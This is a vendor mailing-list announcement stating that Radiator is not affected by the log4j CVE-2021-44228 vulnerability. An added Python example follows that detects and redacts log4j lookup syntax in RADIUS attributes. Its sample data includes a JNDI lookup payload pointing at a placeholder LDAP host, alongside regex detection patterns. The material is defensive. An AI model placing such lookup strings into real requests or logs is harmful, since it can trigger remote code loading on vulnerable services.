From dlr at radiatorsoftware.com Mon Dec 13 10:52:02 2021
From: dlr at radiatorsoftware.com (Daniela Loya)
Date: Mon, 13 Dec 2021 12:52:02 +0200
Subject: [RADIATOR-ANNOUNCE] Radiator is not affected by log4j vulnerability
Message-ID:

On the 10th of December 2021 a vulnerability (CVE-2021-44228) in log4j, a popular Java-based logging utility, was published. Since then, we have received some customer queries about Radiator's vulnerability.

Radiator does not utilise Java or log4j as a component of our software and is therefore not vulnerable to the log4j vulnerability.

While closely following the situation, research, and responses around the vulnerability, we have identified that the RADIUS protocol and infrastructure can be used to deliver the exploit to more vulnerable services such as Java-based backend services, AAA information sources and centralised logging systems. We have documented the principle of this delivery method in a separate blog post found here:

https://blog.radiatorsoftware.com/2021/12/radius-servers-and-log4j-vulnerability.html

We will continue monitoring the issue closely and announce if issues affecting Radiator or Radiator services are found.

--
Daniela Loya Ramos
Sales, Radiator Software Oy
www.radiatorsoftware.com
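
The announcement above notes that RADIUS attribute values can reach Java-based backends and centralised logging systems. The following added example, which is not part of the original message and is not Radiator code, flags and redacts log4j lookup syntax in request attributes before they are handed downstream. The attribute names are standard RADIUS attributes (RFC 2865); the function names and the sample request are constructed for illustration.

```python
import re

# "${" opens a log4j lookup; "${jndi:" is the form tied to CVE-2021-44228.
# Any "${" is flagged, because lookups can nest inside one another.
LOOKUP = re.compile(r"\$\{")
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def classify(value):
    """Return 'jndi', 'lookup' or None for one attribute value."""
    if isinstance(value, bytes):
        # RADIUS string attributes arrive as raw octets; decode leniently.
        value = value.decode("utf-8", errors="replace")
    if JNDI.search(value):
        return "jndi"
    if LOOKUP.search(value):
        return "lookup"
    return None


def scan_request(attrs):
    """List (attribute, verdict) for every flagged value, in request order."""
    hits = []
    for name, value in attrs.items():
        verdict = classify(value)
        if verdict:
            hits.append((name, verdict))
    return hits


def redact(attrs):
    """Copy of attrs with flagged values replaced, for downstream loggers."""
    return {
        name: "[removed: lookup syntax]" if classify(value) else value
        for name, value in attrs.items()
    }


# Constructed sample request; example.invalid is a placeholder host.
SAMPLE = {
    "User-Name": "${jndi:ldap://example.invalid/a}",
    "NAS-Identifier": b"ap-${x}",
    "Calling-Station-Id": "00-11-22-33-44-55",
}

if __name__ == "__main__":
    print(scan_request(SAMPLE))
    print(redact(SAMPLE))
```

A filter like this reduces exposure on the delivery path only; the downstream Java services still need a fixed log4j version.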